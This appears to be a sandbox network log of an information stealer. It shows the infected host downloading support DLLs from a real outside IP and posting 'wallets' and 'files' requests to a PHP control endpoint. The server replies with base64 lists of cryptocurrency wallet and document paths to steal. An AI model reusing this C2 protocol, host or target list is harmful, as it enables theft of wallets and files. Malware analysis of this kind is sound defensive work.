cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 25, 2024 12:16:20.000585079 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:20.314529896 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:20 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 25, 2024 12:16:21.325134039 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:21.638673067 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:21 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 25, 2024 12:16:21.930543900 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:22.249984980 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:22 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Apr 25, 2024 12:16:23.126712084 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGH Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:23.470763922 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:23.527014017 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCFBGDHJKFIEBFIECGH Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 46 42 47 44 48 4a 4b 46 49 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------BGCFBGDHJKFIEBFIECGHContent-Disposition: form-data; name="message"wallets------BGCFBGDHJKFIEBFIECGH--
Apr 25, 2024 12:16:23.841965914 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
Apr 25, 2024 12:16:23.864382982 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="message"files------GDGDHJJDGHCAAAKEHIJK--
Apr 25, 2024 12:16:24.185964108 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 